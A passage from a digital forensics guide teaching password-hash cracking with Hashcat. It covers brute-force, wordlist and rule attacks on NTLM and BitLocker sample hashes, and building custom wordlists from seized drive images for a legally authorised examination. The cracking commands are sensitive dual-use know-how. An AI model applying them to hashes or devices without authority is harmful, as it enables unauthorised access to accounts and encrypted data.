⁸⁹https://github.com/openwall/john
Hash Identification
There may be times when a password hash has been located but the hash type is unknown. Hashcat
has an entire wiki including example hashes that can aid in this process. The example hashes are
located on the Hashcat Wiki⁹⁰ and can help with the hash identification of an unknown hash.
A simple Google search for “Hash Identification” results in multiple online tools that can help
identify the type of hash, be it NTLM, SHA-256, or many others. Several websites include Skerritt⁹¹,
Hashes.com⁹² or Onlinehashcrack.com⁹³. Be wary of using these or any other websites for sensitive
hashes as the website now has the actual hash. For advanced examiners who do not want to use an
online tool, Kali Linux also has an offline tool called Hash-Identifier⁹⁴ that can be downloaded and
used locally so the hash is not shared.
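Newer versions of Hashcat can also make an offline guess at the hash type; assuming the hash has
been saved to a text file, something like the following will list candidate modes without the hash
ever leaving your machine:

hashcat.exe --identify hash.txt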
Attacking the Hash
Once the type of hash is identified, it is time to attempt to crack the hash. The simplest yet least
secure method of cracking a password from a hash is once again to use an online resource. Some of
the previously mentioned websites also offer services that will attempt to crack a hash, but those are
limited. The use of a password cracking tool such as Hashcat is highly recommended as it allows
for a much more powerful, robust, and secure method of cracking a password hash.
Here is a hash taken from the Hashcat Wiki: b4b9b02e6f09a9bd760f388b67351e2b. This is an NTLM
hash of a word in the English language. If you have visited the website then it is easy to determine
what this hash is, but let’s assume that we know nothing about this hash other than it was extracted
from a Windows machine and we wanted to crack this hash using Hashcat. Recall that the method of
cracking this password is to come up with a potential password, hash it, and compare the two hashes
until we find a match. This is a process Hashcat will automate for us. So if we get it wrong, the worst
that will happen is we will move on to the next potential password and try again.
Therefore, there are two primary methods of attacking a password: a brute-force method and a more
focused attack. An exhaustive brute-force attack would take the combination of all possible symbols
on the keyboard and iterate through them. This is not ideal, but let’s explore the mathematical reason
why it is not the best method before explaining a better method.
If an exhaustive attack was to be performed against a password, that would mean that every possible
permutation of all possible characters, numbers, and symbols on the keyboard would be attempted.
For the standard English QWERTY keyboard, there are 10 digits 0123456789, 26 lowercase letters
abcdefghijklmnopqrstuvwxyz, 26 uppercase letters ABCDEFGHIJKLMNOPQRSTUVWXYZ, and 33 special
characters and symbols, `~!@#$%^&*()-_=+[{]}\|;:'",<.>/? . Note that space (the spacebar)
is also included in the special character count. Adding these together results in 10 + 26 + 26 + 33 = 95
⁹⁰https://hashcat.net/wiki/doku.php?id=example_hashes
⁹¹https://nth.skerritt.blog/
⁹²https://hashes.com/en/tools/hash_identifier
⁹³https://www.onlinehashcrack.com/hash-identification.php
⁹⁴https://www.kali.org/tools/hash-identifier/
or ninety-five total possible characters that can be used at any point in a password, assuming they
are all allowed for use in a password. So for a single character password, there are only 95 possible
combinations. For a two-character password, there are 95 x 95 = 9,025 possible combinations. A
three-character password has 95 x 95 x 95 (or 95³) = 857,375 combinations, a four-character has
95⁴ = 81,450,625 combinations, and a very short five-character password has an astonishing 95⁵ =
7,737,809,375 password combinations, over seven billion! Even a meager eight-character combination
has over six quadrillion (a quadrillion is the name of the number just beyond trillion) possible
combinations for just the eight characters alone! Not only does this show the difficulty of using
every possible character, but it also shows the strength of using unusual symbols in passwords.
Even with modern computing that is capable of attempting thousands of possible passwords per
second, it could take decades or longer to crack an eight-character password using this method on
normal computers. We need a better method!
So to speed up this process we need to make some assumptions about the original password rather
than guessing random characters. This brings up the primary weakness and therefore the best
method of attacking passwords once the examiner has the hash. Since most passwords must be
remembered by the user, it is very likely to contain a word in a language that the user knows. The
total number of guesses can be greatly reduced by avoiding letter combinations that are not words.
The total number of words in the 2022 Oxford English dictionary is over 600,000 words, but this does
include outdated, obsolete, and obscure words. Still, this is a huge improvement over even a short
three-letter permutation!
It is also common to add numbers or symbols to the end of the password. So we can also add numbers
to the end of a valid word and try those combinations. Sophisticated users may decide to use “leet
speak⁹⁵” and replace letters like ‘S’ with the number ‘5’, the letter ‘A’ with the number ‘4’, the letter
‘E’ with the number ‘3’, the letters ‘I’ or ‘l’ with the number ‘1’ because they look similar to the
corresponding letter. For example, the word “Apples” may become “4pp135” when using leet speak.
Finally, the addition of symbols is common at the end of the password, so common symbols like “!”
can be added to the end (Picolet, 2019). This is by no means an exhaustive list, but this is a good
starting point considering the alternative of a true brute force attack.
⁹⁵https://en.wikipedia.org/wiki/Leet
Wordlists
Now that we know a better method, we need to come up with a way to use that method to attack
passwords. The simplest method would be to use a list of words or a wordlist of possible passwords.
Just like it sounds, it is a list of possible passwords that already have symbols and numbers added to
them. When using a wordlist to attack a password, it is often called a dictionary attack. It is possible
to manually build our wordlist, but that is a very time-intensive task as we would not only need to
create useful passwords but avoid duplicates. Fortunately, there are prebuilt wordlists that we can
use.
When companies are hacked, a part of the data that is often stolen is the passwords. Companies
should encrypt their data, specifically user passwords, but this is not always the case. In 2009, the
social gaming company RockYou was compromised by a SQL injection attack. The hacker was able
to gain access to over 32 million accounts and they were storing passwords in the clear, which
means that there was no encryption whatsoever on the passwords as they were stored in plain text
(Cubrilovic, 2009). This list of passwords has become known as the rockyou list and is commonly
used as a starting point for dictionary attacks. Future breaches where the passwords have been
compromised and cracked have also been added to wordlists. It is important to note that a good
password list will have been deduplicated so it contains no repeated passwords. This is a key way to
save time when cracking passwords by not attempting the same password multiple times.
A good online resource where wordlists are compiled and ranked is Weakpass.com⁹⁶ (W34kp455,
2014). On this site, wordlists are ranked by order of popularity and functionality from 0 to 100
and using a color-coding system that corresponds with the numerical ranking. Note how there are
varying sizes of lists, ranging from over 400GB to only a few bytes in size. The first several wordlists
offered for download may not be ranked very high, being color-coded red and ranked only in the
single digits. Selecting “Lists” and selecting “Medium” should display the original rockyou wordlist as
rockyou.txt on the first page with just over 14 million unique passwords. When selecting “Lists”
from the horizontal menu and selecting “All” we can sort all lists by popularity. Near the top of
the list should be the cyclone.hashesorg.hashkiller.combined.txt password list with about 1.5
billion total passwords. This list is one of the top-ranked lists while only being just over 15GB in
size. I recommend this list and use it frequently because it offers a good balance: its size is
manageable, yet it has enough coverage to crack most common passwords. The total time
to iterate through the list is not unreasonable for many password hash types, and it stands a decent
chance of cracking many passwords with a straight dictionary attack. The “All-in-One” tab allows
for downloading a deduplicated version of all passwords on the site in various lengths for different
applications, but know that a longer list will take longer to complete than a shorter list. If you
haven’t noticed, there is also an estimated time to iterate through the list for a particular password
type under each list. While this can vary widely between different computers, it does a good job of
showing the relative time difference it takes to attempt that list against the different hash types. If
the 15GB password list is too large for you, here⁹⁷ is a smaller list that is not posted on Weakpass.
⁹⁶https://weakpass.com/
⁹⁷https://github.com/FullTang/AndroidPWList
This list combines several of the smaller wordlists from Weakpass and uses a few other techniques,
for an uncompressed size of just under 1GB. If you plan on installing and using Hashcat,
I would strongly recommend downloading at least one list of your choice.
Installing Hashcat
Now that we know some of the more common methods used to create passwords, and we have
access to a good list of millions of potential passwords, we can attempt to crack the example hash
using Hashcat. The most recent version of Hashcat can be securely downloaded here⁹⁸ (Hashcat -
Advanced Password Recovery, n.d.). Considering the type of calculations performed, it is much more
efficient to use the video card of a computer to perform these calculations rather than use the CPU.
This may cause some compatibility issues; if so, help on how to install Hashcat can be found on
the Hashcat Discord server⁹⁹. I would encourage anyone who has not used Hashcat, or even a
command-line tool in general, to follow along at this point on their own Windows machine, even
if you have not extracted any hashes up to this point. We will crack the previously mentioned
example hash (b4b9b02e6f09a9bd760f388b67351e2b) from Hashcat’s website here shortly!
Once Hashcat is installed, it needs to be launched from the command line, or command
prompt, assuming the user is using a Windows system. The simplest method to launch a
command prompt window in the correct location is to navigate to where Hashcat is installed
(C:\Windows\Programs\hashcat-6.2.5 or similar) using File Explorer, click the white area next to
the path so that the path turns blue, type cmd and press enter. A black window with white text
should appear. If you have never used the command line before, congratulations on opening your
first terminal window!
The next step is to launch Hashcat in help mode. This will also see if the correct drivers are installed
to allow for Hashcat to run. Simply type hashcat.exe -h in the command prompt. It is possible
that an error occurred stating an OpenCL, HIP, or CUDA installation was not found. If this is the
case, I would recommend typing Device Manager in the search bar next to the Windows Start menu
and then selecting Display adapters to determine the type of video card installed on the computer.
Beyond this, it will require downloading the required drivers from a trusted source to continue using
Hashcat. Once again, additional help on how to install Hashcat can be found on the Hashcat Discord
Server¹⁰⁰.
If the hashcat.exe -h is successful, then there should be a large amount of output on the screen
showing options, hash modes, and examples, and should end with some links to the Hashcat website.
I find it helpful to save this help information to a simple text file for easy reference. That can be done
by pressing the up arrow on the keyboard to display hashcat.exe -h again, but before pressing enter
add > Help.txt to the end of the command for the total command of hashcat.exe -h > Help.txt.
This will create a text file in the same folder with the output from the help command which can be
opened in Notepad or similar for quick reference while keeping the command prompt window free
to run Hashcat.
Open the Help.txt that was just created in the hashcat-6.2.5 folder. Under - [ Hash Modes ] - it
shows the numerous types of hashes that can be attacked (and possibly cracked) assuming the hash
is properly extracted. Scrolling to the bottom shows some example commands to run Hashcat under
⁹⁸https://hashcat.net/hashcat/
⁹⁹https://discord.gg/vxvGEMuemw
¹⁰⁰https://discord.gg/vxvGEMuemw
- [ Basic Examples ] -. Note that the first Attack-Mode is a Wordlist, but there is also a Brute-
Force option. This is not a true brute-force method as was discussed earlier, as it does not use all the
possible symbols on the keyboard, nor does it use uppercase letters except for the first character. One
advantage is that it does not require a dictionary or wordlist to crack a password, so it has its uses.
Let’s break down this command.
Under example command, the first word is hashcat. It can also be hashcat.exe. This is simple, we
are just calling the executable file, but we need to give some input or arguments to the program.
The next thing we see is -a and then a number followed by -m followed by another number. At the
top of the help file, we see under - [ Options ] - it explains -a as the attack-mode and -m as the
hash-type. Both of these are required; they can appear in either order, but we will follow the order
shown in the example. Scrolling back down towards the bottom we
find - [ Attack Modes ] - where it shows the types of attacks. Brute-Force is 3 while Straight is
0. Brute-Force is Hashcat’s version of brute-force that was just briefly mentioned, while Straight is
a dictionary attack using a wordlist. Now for the other required argument, the -m. This stands for
hash-type, so we scroll up to the bulk of the help file under - [ Hash Modes ] - and see all the
different types. We know this is an NTLM hash, so we need to find the hash-type for NTLM in all
of that noise. Rather than manually searching, press CTRL + F to open the find menu and type NTLM.
You may get some results like NetNTLMv1, NetNTLMv1+ESS, or NetNTLMv2 and you may have to change
your direction of searching to find matches, but you should be able to find just NTLM all on one line
with a mode of 1000. Now that we know the required parameters for our two required arguments,
onto how to input the hash itself into Hashcat.
When it comes to the hash itself, Hashcat will accept the hash in one of two ways. It can either be
pasted directly into the command line, or it can be put into a simple text (.txt) file with one hash and
only one hash per line. If a text file containing multiple hashes is used, it needs to be all hashes of
the same type, like multiple NTLM hashes or multiple SHA-256 hashes, with each hash on its own
line. If attacking multiple hashes, the file method will be faster than trying to crack them one at a
time, but slower than cracking a single hash. Pasting directly into the command line can be faster
if the hash is already extracted, but taking a few seconds to put the hash in a text file right after
extraction may be better in some situations.
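As a sketch of both input styles using the example hash from this chapter (the file name is arbitrary):

rem Hash pasted directly on the command line
hashcat.exe -a 3 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b
rem The same hash stored one-per-line in a text file
hashcat.exe -a 3 -m 1000 hashes.txt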
The example command shows some arguments like ?a?a?a?a?a?a after the example0.hash, but
those are not required. Other optional arguments can be seen towards the top of the help file. We
now know everything required to crack this example NTLM hash:
b4b9b02e6f09a9bd760f388b67351e2b.
“Brute-Forcing” with Hashcat
Go to the command line where we typed in hashcat.exe -h and type hashcat.exe -a 3 -m 1000
b4b9b02e6f09a9bd760f388b67351e2b and hit enter. There should be a wall of white text and then
it will stop and it should show Cracked partway up on the screen! Above the Cracked notification,
there will be the hash and at the end, it will show b4b9b02e6f09a9bd760f388b67351e2b:hashcat.
This means the password was hashcat, as can be seen at the top of the Hashcat Wiki webpage. If
this is your first time cracking a password then congratulations! You just cracked your first password
hash! Now let’s examine what Hashcat did during that wall of white text.
Scrolling up we can see the first block of text, similar to the block of text at the end, but instead of
saying Cracked it says Exhausted. Looking at the Guess.Mask row in the first column we see a ?1
[1], and on the next row we see a Guess.Charset. The Guess.Charset row shows the -1 followed
by ?l?u?d. To know what those mean, we need to go back to our help file. Under
- [ Built-in Charsets ] - close to the bottom we see that l is all lowercase characters, u is all
uppercase characters, and d is all digits from 0 to 9. Putting it all together, this means Hashcat tried
all lowercase, uppercase, and digits for a password length of 1 before exhausting and moving on.
Notice how at the top it showed Approaching final keyspace - workload adjusted., which
means Hashcat realizes it is about to come to the end of its current process and is preparing what
it needs to do next.
The second block shows a Guess.Mask of ?1?2 [2]. Therefore, there was a total of two characters,
but this time it is a little different. The ?2 is only ?l and ?d, meaning for the second character it
only tried lowercase and digits, while the first character was still a ?1, so it tried lower, upper, and
digits like in the first block. The third block is a Guess.Mask of ?1?2?2 [3], so three characters total,
trying uppercase, lowercase, and digits for the first character and lowercase and digits for the other
two. The fourth, fifth, and sixth blocks all show uppercase, lowercase, and digits for the first
character with lowercase and digits for the rest. The seventh block is where it was cracked, using
the same Guess.Mask format of ?1?2?2?2?2?2?2. The password was not long enough to see it in this
example, but if we didn’t crack it at seven characters the mask would keep getting longer, and
eventually the ?3 charset would be added to the end, which also tries the five symbols *!$@_ in
addition to lowercase and digits for the last character.
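You can also supply your own mask instead of relying on the default increment. As a sketch of the
syntax, the following mirrors the default charsets described above for an exact length of eight
characters:

rem -1 and -2 define custom charsets that ?1 and ?2 then reference in the mask
hashcat.exe -a 3 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b -1 ?l?u?d -2 ?l?d ?1?2?2?2?2?2?2?2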
Hashcat’s Potfile
This worked for this password, but for more complicated passwords we can see where it has its
limitations. That is why we need a robust wordlist. So let’s try and crack this password again using
a wordlist, and in doing so we will discover a useful function of Hashcat. First, find the wordlist
that you previously downloaded in File Explorer and unzip it. It may not have a file extension, but
Hashcat doesn’t care, and you likely could not open the file in standard Notepad anyway, as it is
probably too big. If you want to see the contents, you should be able to use another text editor like
Notepad++ for smaller wordlists, but it is
by no means required. Let’s go back to the command line where we just cracked the hash and type
out a new command. Type hashcat.exe -a 0 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b, not
forgetting to put a single space after the hash, but don’t hit enter just yet. Hashcat needs the path to
the wordlist; note how we are using -a 0 instead of -a 3. If you are savvy with the command line,
you could enter the path of the file (not forgetting quotes if there are any spaces), or you could copy
the path from the File Explorer window (where we typed cmd earlier to open our command prompt
window) and then add the file name, but there is an easier way that some may consider cheating.
If you are not cheating you are not trying, right? The easiest way is to just drag and drop the
uncompressed wordlist into the black area of the command prompt window and it should populate
the whole path to the file in the command line. The whole command should look something like this:
hashcat.exe -a 0 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b "D:\My Folder\My Downloaded
Wordlist". There may or may not be quotes around the path depending on whether there are spaces in the
folder and subfolders or the file name. Hit enter and see what happens.
It should have finished very quickly and displayed a notification of INFO: All hashes found in
potfile! Use --show to display them. Well, that is interesting, what is a potfile? Simply put,
the potfile is where Hashcat automatically stores hashes it cracks with the corresponding password
in plain text. This is very useful to make sure that time is not wasted trying to crack passwords
that have already been cracked and to make sure a cracked password is saved in case of power
failure. It would be most unfortunate if a password was cracked before the examiner could see
it and the power went out to a machine that was not hooked up to an Uninterruptible Power Supply (UPS)
due to budgetary concerns. Anyway, go to the hashcat-6.2.5 folder where hashcat.exe is located,
find the file named hashcat.potfile and open using Notepad or the text editor of your choice.
Assuming this is your first time using a freshly downloaded Hashcat, there will only be one entry,
b4b9b02e6f09a9bd760f388b67351e2b:hashcat. This is nice to prevent us from wasting time trying
to crack it again, but we want to see how to try and crack it using other methods. Either delete
the single entry from the potfile, save, and close, or just delete the whole potfile as Hashcat will
automatically generate a new one upon cracking another password.
Dictionary (Wordlist) Attack with Hashcat
Go back to the command prompt and press the up arrow on the keyboard. Your previously typed
command of hashcat.exe -a 0 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b "D:\My Folder\My
Downloaded Wordlist" or similar should appear. Press Enter to run the command again. Now
it should start processing, but it will stop after a moment and display something like Watchdog:
Temperature abort trigger set to 90c. As a side note, it is nice to know that Hashcat has
built-in safety procedures to help prevent the overheating of video cards; it will slow down its
processing speed if the GPU (aka video card) gets too hot. Anyway, after a few seconds, it should
display something like Dictionary cache building "D:\My Folder\My Downloaded Wordlist":
1711225339 bytes (10.61%) with the percentage increasing every few seconds. This is normal and
depending on the size of the wordlist it might take a minute or two. This is required after the first
time starting a new wordlist, but as long as the location of the wordlist does not change it will not
need to build the dictionary each time. Once the dictionary is built, it will display the following line:
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>. This shows what commands we
can enter while it is processing. It would be nice to know what is going on, so press the s key.
The first thing I look at is the Time.Estimated row and it will show an estimated end date and time
and estimated duration. This is where times can vary greatly based on the type of GPU and length
of the wordlist. Even if a longer wordlist was chosen, it should not take long to crack the password.
This is assuming that the word “hashcat” is in the dictionary, but hopefully it is there. This method
will likely take a bit longer than the brute-force method, but it is much more robust and is one of
the best methods for cracking passwords. We are going to try one more method for now, so go back
to the potfile and delete the most recent entry from the potfile or just delete the whole potfile.
Dictionary + Rules with Hashcat
The obvious weakness of the dictionary attack is the password has to be in a precompiled dictionary,
but what if it is a complicated password not in a wordlist? What if the user made a password
that used unusual symbols or used numbers at the beginning, used numbers instead of letters,
or added an unusual number of symbols to the end? This can be cracked by Hashcat by using a
combined dictionary and rule attack. Hashcat comes preloaded with rules, and additional rules can
be downloaded just like wordlists can be downloaded. At this time, I have not found any rules that
are noticeably superior to the rules that come standard with Hashcat but it is left up to the examiner
to decide what they want to use.
After deleting the most recent entry in the potfile, check the hashcat-6.2.5 folder and there should
be a folder named rules. Inside the rules folder, there are plenty of prebuilt rules. My personal
favorite is the onerulestorulethemall rule as the name has a nice ring to it. It is also a good rule
in general, but again it is mostly personal preference and trial and error. It is worth mentioning
that while these rules are only a few kilobytes in size, they can add a substantial amount of time to
how long it takes to process a hash as all commands in each rule will be applied to each potential
password in a wordlist. Just like with dictionary attacks, a bigger rule will take longer and yield
more potential passwords but a smaller rule will be faster but with fewer generated passwords.
Go back to the command prompt and press the up arrow. Adding a rule to a dictionary attack is
quite easy, we just need to add a -r followed by the path to the rule file after the dictionary at the
end of the command. Just add -r to the end of the command, put a space, then drag and drop the
rule of your choice into the command prompt window. The command should look something like
hashcat.exe -a 0 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b "D:\My Folder\My Downloaded
Wordlist" -r "D:\hashcat-6.2.5\rules\onerulestorulethemall.rule". Once the syntax looks good,
press enter. This time the dictionary should not have to compile, as it will display Dictionary cache
hit: and then information on the location of the dictionary. Press the s key on the keyboard to see
the status, and note how the Time.Estimated row has increased, possibly to a day or more. Hopefully,
it will not take longer than a few minutes to crack our example hash again. This method does take
longer, but again we are attacking the hash in a way that will crack more complicated passwords
than the previously discussed methods.
Robust Encryption Methods
Up to now, we have only cracked an NTLM hash, but what about more robust
encryption methods? Go to the Hashcat Example Hashes¹⁰¹ and search for BitLocker,
which should be mode 22100. The resulting example hash is as follows:

$bitlocker$1$16$6f972989ddc209f1eccf07313a7266a2$1048576$12$3a33a8eaff5e6f81d907b591$60$316b0f6d4cb445fb056f0e3e0633c413526ff4481bbf588917b70a4e8f8075f5ceb45958a800b42cb7ff9b7f5e17c6145bf8561ea86f52d3592059fb

This is massive compared to the NTLM hash! Try it in Hashcat using the following command:

hashcat.exe -a 3 -m 22100 $bitlocker$1$16$6f972989ddc209f1eccf07313a7266a2$1048576$12$3a33a8eaff5e6f81d907b591$60$316b0f6d4cb445fb056f0e3e0633c413526ff4481bbf588917b70a4e8f8075f5ceb45958a800b42cb7ff9b7f5e17c6145bf8561ea86f52d3592059fb
The brute-force starts at four characters because BitLocker originally required a minimum password
length of four so Hashcat is smart enough to not waste time trying less than four characters when
attacking a BitLocker password. For my computer, it shows an estimated time of 1 hour and 19
minutes for just 4 characters. If I let it run and go to 5 characters, it shows it will take 2 days
to just try 5 characters! Your computer may have different estimated times, but unless you have
a really good gaming computer or are running Hashcat on a computer designed for mining
cryptocurrency you are probably seeing similar numbers. Trying the same BitLocker hash but
just using a dictionary attack with no rules against the cyclone.hashesorg.hashkiller.combined
dictionary shows an estimated time of 28 days!
Knowing this means that if an NTLM hash was cracked using the cyclone.hashesorg.hashkiller.combined
dictionary, it will take about a month at the most for the same BitLocker password to
be cracked. This time can be significantly reduced by using a computer with multiple GPUs like
computers used for mining cryptocurrency. This is a really good reason to not have a password that
comes standard in most dictionary attacks and shows why strong and complicated passwords are
important.
This is just examining BitLocker; the VeraCrypt and DiskCryptor example hashes require
downloading a file because they are too large to display on Hashcat's website. This shows a substantial
difference between the password hashing used by Windows and robust encryption software, but
it also shows why it is very important to not reuse passwords. If an attacker can compromise the
weak Windows password and the same password is also used for robust encryption software then
the strong encryption method is very easily defeated. It also shows how a robust encryption method
can be defeated by using a good wordlist and why strong passwords are the first line of defense no
matter what encryption method is used.
¹⁰¹https://hashcat.net/wiki/doku.php?id=example_hashes
Complex Password Testing with Hashcat
Maybe you have gotten the bug by now and our simple hash that is just “hashcat” is not good
enough and you want to try even harder potential passwords. The easiest way to attempt to crack
more difficult passwords is to use an NTLM hash generator. Online NTLM hash generators hosted
on a website may be the easiest route, but there is a major security concern if the user wants to test
their own passwords and converts them using an online tool. By using the online tool the user has
likely given up their password to a third party if that online tool is logging input to their website. I
would only recommend using an online tool for testing passwords that the user is not using, and I
would not even use similar passwords to ones that are currently in use in an online tool.
The next best method would likely be PowerShell functions¹⁰² or Python scripts¹⁰³ that can generate
NTLM hashes. These links are just two possible ways to create an NTLM hash, but searching Google
can find other methods as well. This is much more secure as the processing to convert the password
to an NTLM hash is done on the user’s computer. Just note that if the password is cracked, it will
be saved in the potfile so it would be wise to either delete the entry from the potfile or delete the
potfile altogether once the testing session is complete.
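As a rough illustration of what those scripts are doing under the hood, an NTLM hash is just the MD4 digest of the UTF-16LE-encoded password. A minimal Python sketch (assuming your Python/OpenSSL build still exposes MD4, which some newer distributions disable) could look like this:

import hashlib

def ntlm_hash(password: str) -> str:
    # NTLM = MD4 over the UTF-16LE encoding of the password.
    return hashlib.new('md4', password.encode('utf-16le')).hexdigest()

print(ntlm_hash('hashcat'))  # prints b4b9b02e6f09a9bd760f388b67351e2b

The output for the word hashcat matches the example hash we have been cracking throughout this chapter.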
Searching a Dictionary for a Password
Since we have already mentioned that the main weakness of a password is the existence of that
password in a wordlist, it might be nice to see if our current password or other potential password
shows up in a dictionary. Since these wordlists are very large, it is difficult to find a program that will
open them up to do a simple Ctrl + F to search the document to find the password. Fortunately, the
command line offers an easier way to search the contents of a file without opening the file. Using File
Explorer, navigate to the folder where you have downloaded and uncompressed a wordlist. Open
a command-line window just like we did for running Hashcat by clicking the white area next to
the path so that the path turns blue, type cmd, and press enter. We are going to use the findstr
command to search the contents of a dictionary. In the command line, type findstr password and
then press [TAB] until the dictionary you want to search appears. The completed command should
look something like findstr password MyDictionary. Press enter. If you chose a common password
it should output a wall of white text showing every entry that contains that string. If it just
shows a blinking cursor, then it is still searching for a match. When you can type again, it has
finished searching.
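If findstr is not available, or the wordlist lives on a Linux box, a few lines of Python accomplish the same streaming search without ever loading the whole file into memory (MyDictionary is a placeholder file name):

needle = "password"  # the candidate password to search for
with open("MyDictionary", "r", encoding="utf-8", errors="ignore") as wordlist:
    for line in wordlist:
        if needle in line:
            print(line.rstrip("\n"))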
This is a good way to check if a password exists in a dictionary or wordlist, but if the password does
not show up that does not necessarily mean it can’t be cracked with that dictionary. An appropriate
rule would have to be added to mangle the wordlist in a way that would cause the password to be
guessed by Hashcat. Still, since dictionary attacks are the most common and the fastest method of
cracking a password, it is a good yet simple test to see if the password is a strong password or not.
¹⁰²https://github.com/MichaelGrafnetter/DSInternals/blob/master/Documentation/PowerShell/ConvertTo-NTHash.md
¹⁰³https://www.trustedsec.com/blog/generate-an-ntlm-hash-in-3-lines-of-python/
Generating Custom Wordlists
Now I am going to move into some more advanced concepts and assume that the reader is somewhat
familiar with forensic examinations of electronic devices. Some of the more basic concepts related
to forensic exams will be overlooked when explaining these techniques, and some of the advanced
concepts will only be discussed briefly. The remainder of this chapter is simply intended
to show what is possible and how it can be useful in a thorough examination. Two reasons for
using custom wordlists are attacking a particularly stubborn password (good for them for using
a strong password!) and generating a wordlist for forensic tools that require a static
wordlist/dictionary to attack alphanumeric passwords like those used on some Android devices.
As an example of how to use both of these techniques in a forensic examination, let’s say an examiner
has the legal authority to examine a Windows computer and an Android phone from the same
target/suspect user. Both devices are in the examiner’s possession. The drive for the computer is not
encrypted with BitLocker or other methods and the examiner was able to acquire an .E01 of the hard
drive from the computer, but the phone is locked with an alphanumeric password and unfortunately,
we have not cracked the NTLM hash with the methods already mentioned. Because the data on the
hard drive is not encrypted, there is now a wealth of information about the target including user-
generated data. It is even possible that there is simply a document saved somewhere on the hard
drive that contains the passwords for that user that may contain the Windows (NTLM) password
and the phone password. Rather than manually looking through the contents of the hard drive, there
are tools that will search the hard drive and build wordlists for us.
The first tool is the AXIOM Wordlist Generator¹⁰⁴. This requires the examiner to have access to the
Magnet AXIOM forensic software. The .E01 image will need to be processed with AXIOM Process,
and then the AXIOM Wordlist Generator can be used. Instructions for how to use the AXIOM
Wordlist Generator are on their website. A free alternative that is more comprehensive but yields
more false positives is to use Bulk Extractor¹⁰⁵ with the following command: bulk_extractor -E
wordlist -o <output directory> <imagefile.E01>. For example, if the examiner had acquired an
.E01 image of a hard drive and named the acquisition HDD.E01 and wanted to output the wordlist to
a folder called Wordlist that was in the same folder as the HDD.E01 file with a terminal window open
in the same directory as the HDD.E01 file, the following command would be used: bulk_extractor -E
wordlist -o Wordlist HDD.E01. Bulk Extractor comes standard with a Kali Linux build, but is also
available on Windows. I find it is better to use a Linux box, but to each their own. A Linux virtual
machine (VM) or other access to Kali Linux or similar can be used, as nearly all Linux distributions,
including Kali Linux, are free. If using a Linux VM, one option is VirtualBox¹⁰⁶. While a VM
can be used, it is not difficult to set up a USB thumb drive or an external hard drive with Kali Linux
or similar and change the boot order on the computer to boot to a fully functional and persistent
Kali Linux. The instructions for this procedure are on the Kali Linux website¹⁰⁷. I would recommend
this second method if you are planning on further customizing wordlists by paring them down as is
¹⁰⁴https://support.magnetforensics.com/s/article/Generate-wordlists-with-the-AXIOM-Wordlist-Generator
¹⁰⁵https://www.kali.org/tools/bulk-extractor/
¹⁰⁶https://www.virtualbox.org/
¹⁰⁷https://www.kali.org/docs/usb/live-usb-install-with-linux/
discussed in the next section, but a Kali VM will work as well. Once the wordlist is generated with
the preferred method (or both methods), the NTLM password from the Windows machine can be
attacked again and hopefully cracked. By using the cracked Windows password, we can then use
virtualization software to log in to the suspect machine virtually and examine the saved passwords
in Chrome, Edge, or other browsers. With the cracked NTLM and the saved browser passwords, we
now have several potential passwords for the phone. Those exact passwords could be tried on the
phone, using a forensic tool of course, but what if it was an unknown variation of those passwords?
It is also possible that we have yet to crack even the NTLM password if it is a strong password. There
is still hope if the keyword/baseword used in the password is in the wordlist we have generated. For
example, the target password might be 123456Password!@#$%^. We just have to get rid of the noise in the
custom wordlist and then mangle the wordlist in a way that will generate the target password. Kali
Linux can help us with that process.
Paring Down Custom Wordlists
If a really strong password has been used, then it may not be cracked even with a custom-built
wordlist using the AXIOM Wordlist Generator and Bulk Extractor to pull passwords from the target
device. It is also possible that the password uses a word from another language. If this is the case, the
examiner will need to focus their efforts even more and get rid of the “noise” in the custom wordlist.
It would also be a good idea to download a list of words for the target language. This link¹⁰⁸ is a
good place to start when looking for wordlists in other languages. A simple Google search should
also yield results for wordlists in the target language.
With all three lists (AXIOM wordlist, Bulk Extractor, and foreign language) we need to combine them
into one list. A simple copy-paste can work, but the lists may be too large to open and copy into
one file. Fortunately, Linux has a concatenate command (cat) that will combine files. After copying all
the files/wordlists to Kali Linux, open up a terminal window and type the following command: cat
AXIOMWordlist BulkExtractorWordList ForeignLanguageWordList > CombinedWordList, choosing
the correct file names, of course.
Now we run into the issue of potential duplicate lines. There are tools built into Linux that can
handle these duplicates: sort CombinedWordList | uniq -d will show whether any duplicate lines
exist, and awk '!seen[$0]++' CombinedWordList > CombinedWordListDedupe will remove them while
preserving the original order. The problem is that we then run into the issue of the different line
endings/carriage return symbols used by Unix vs Windows. A carriage return is simply the [Return]
or [Enter] character at the end of a line that tells the operating system to start a new line. Unix uses
a different line-ending character than Windows, so two lines may be identical except for the
carriage return, but that won't be recognized by
normal Linux commands and there will be duplicate lines in our wordlist. There is a program called
rling¹⁰⁹ that will need to be compiled on a Linux system. It is not in the normal distributions, so a
sudo apt install from the terminal window will not work. Certain dependencies like libdb-dev
and Judy may need to be installed first, using sudo apt-get update -y, then sudo
apt-get install -y libdb-dev for libdb-dev and sudo apt-get install libjudy-dev for Judy. The rling
command will then be run from the location where it was compiled by using ./rling in that directory,
unless the entire rling folder is stored in the /usr/share folder on the Linux system after compiling the
program. I would recommend copying the rling folder to the /usr/share folder so it can run
from the terminal window like Hashcat or Bulk Extractor, letting you call the command by simply
typing rling from anywhere on the system. I understand that this is somewhat technical and I did
not go into great detail, but this is the best and fastest method I have found for deduplication that
also properly deals with carriage return issues.
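For smaller lists, a Python sketch can sidestep the carriage return problem entirely by stripping both the Windows (CRLF) and Unix (LF) line endings before deduplicating. Note that this holds every unique word in memory, which is exactly the limitation rling was built to avoid, so treat it as a convenience for modest wordlists only:

seen = set()
with open("CombinedWordList", "rb") as src, \
     open("CombinedWordListDedupe", "wb") as dst:
    for raw in src:
        word = raw.rstrip(b"\r\n")  # normalizes both CRLF and LF endings
        if word and word not in seen:
            seen.add(word)
            dst.write(word + b"\n")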
Once we have chosen our deduplication method, it may be useful to change characters that
have escaped HTML conversion back to their ASCII equivalents. What this means
is there may be a &gt inside a password where the original character was simply a >. The way
to automate this conversion is with the following command: sed -i 's/&gt/>/g' WordList.txt.
¹⁰⁸https://web.archive.org/web/20120207113205/http:/www.insidepro.com/eng/download.shtml
¹⁰⁹https://github.com/Cynosureprime/rling
